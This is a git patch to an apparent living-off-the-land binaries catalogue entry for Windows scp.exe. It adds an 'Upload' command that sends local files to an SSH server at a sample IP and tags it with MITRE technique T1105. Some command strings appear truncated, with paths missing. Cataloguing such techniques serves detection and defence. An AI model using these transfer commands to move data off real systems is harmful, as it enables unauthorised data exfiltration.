From 354553efa3cddb5b8803813e0f05d6fbb5bb7603 Mon Sep 17 00:00:00 2001 From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com> Date: Mon, 14 Nov 2022 12:04:58 +0700 Subject: [PATCH] Update scp.yml Added upload functionality --- yml/OSBinaries/scp.yml | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/scp.yml b/yml/OSBinaries/scp.yml index f3b584b..73c72d8 100644 --- a/yml/OSBinaries/scp.yml +++ b/yml/OSBinaries/scp.yml @@ -12,12 +12,19 @@ Commands: MitreID: T1202 OperatingSystem: Windows 10, Windows 11 - Command: "scp @192.168.187.128: " - Description: Download file with scp.exe from am SSH server - Usecase: Use scp.exe to download file from an SSH server. If needed, you will be asked to submit a password as well. + Description: Download file with scp.exe from an SSH server + Usecase: Use scp.exe to download file from an SSH server. If needed, you will be asked to submit a password for the SSH session. Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 + - Command: "scp @192.168.187.128:" + Description: Upload file with scp.exe to an SSH server + Usecase: Use scp.exe to Upload file from the local machine to remote SSH server. If needed, you will be asked to submit a password for the SSH session. + Category: Upload + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\OpenSSH\scp.exe Detection: